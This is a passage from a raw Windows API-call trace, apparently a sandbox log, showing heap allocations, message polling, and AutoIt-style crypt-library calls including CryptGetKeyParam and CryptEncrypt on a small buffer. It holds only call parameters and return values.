(HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.851] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0030.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0030.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0030.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0030.852] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0030.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0030.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0030.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0030.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0030.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.852] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0030.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0030.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.852] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0030.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0030.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0030.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0030.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0030.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0030.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0030.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0030.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0030.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0030.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0030.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0030.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0030.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0030.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0030.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0030.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0030.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0030.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0030.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0030.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0030.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0030.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0030.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0030.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0030.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0030.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0030.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0030.855] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0030.856] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da298, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da298*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0030.856] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.856] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.856] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.856] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.856] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.856] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.856] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.856] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.856] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0030.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.857] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.857] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.857] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.857] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.857] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.857] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.857] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.857] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0030.857] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.857] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.857] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0030.857] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.858] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.858] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x3153, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x3160) returned 1 [0030.858] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.858] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.858] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.858] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.858] CharLowerBuffW (in: lpsz="byte[12641]", cchLength=0xb | out: lpsz="byte[12641]") returned 0xb [0030.858] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.858] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.858] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.858] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.858] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.858] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x89ffb8*, pdwDataLen=0x6ae220*=0x3153, dwBufLen=0x3160 | out: pbData=0x89ffb8*, pdwDataLen=0x6ae220*=0x3160) returned 1 [0030.859] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.859] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.859] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.859] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.859] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.859] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.859] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0030.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.859] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.859] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.859] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.859] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.859] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.859] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.859] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.859] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.859] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.859] HeapFree (in: hHeap=0x770000, 